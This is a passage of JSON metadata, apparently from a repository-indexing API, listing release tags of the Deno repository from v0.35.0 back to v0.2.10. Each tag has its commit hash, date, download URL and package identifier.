mmit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.g